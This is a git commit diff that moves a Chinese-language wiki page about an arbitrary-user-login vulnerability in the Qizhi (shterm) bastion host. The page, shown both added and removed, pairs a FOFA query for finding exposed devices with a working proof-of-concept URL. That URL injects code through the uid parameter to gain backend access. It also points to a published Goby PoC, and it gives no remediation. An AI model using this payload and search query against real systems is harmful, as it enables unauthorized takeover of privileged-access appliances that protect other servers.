adjust name rules

This commit is contained in:
helloexp 2022-02-25 15:33:09 +08:00
parent 7ca52f7cb9
commit 1d1165414a
5 changed files with 36 additions and 39 deletions

View File

Before

Width:  |  Height:  |  Size: 188 KiB

After

Width:  |  Height:  |  Size: 188 KiB

View File

@ -1,3 +1,37 @@
# 齐治堡垒机
# 齐治堡垒机 任意用户登录漏洞
#### 齐治堡垒机 任意用户登录漏洞
## 漏洞描述
齐治堡垒机 存在任意用户登录漏洞访问特定的Url即可获得后台权限
## 漏洞影响
> [!NOTE]
>
> 齐治堡垒机
## FOFA
> [!NOTE]
>
> app="齐治科技-堡垒机"
## 漏洞复现
漏洞POC为
```
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
![](image/qz-1.png)
## Goby & POC
> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login
![](image/qz-2.png)

View File

@ -1,37 +0,0 @@
# 齐治堡垒机 任意用户登录漏洞
## 漏洞描述
齐治堡垒机 存在任意用户登录漏洞访问特定的Url即可获得后台权限
## 漏洞影响
> [!NOTE]
>
> 齐治堡垒机
## FOFA
> [!NOTE]
>
> app="齐治科技-堡垒机"
## 漏洞复现
漏洞POC为
```
http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
```
![](image/qz-1.png)
## Goby & POC
> [!NOTE]
>
> 已上传 https://github.com/PeiQi0/PeiQi-WIKI-POC Goby & POC 目录中
>
> shterm(QiZhi) Fortress Arbitrary User Login
![](image/qz-2.png)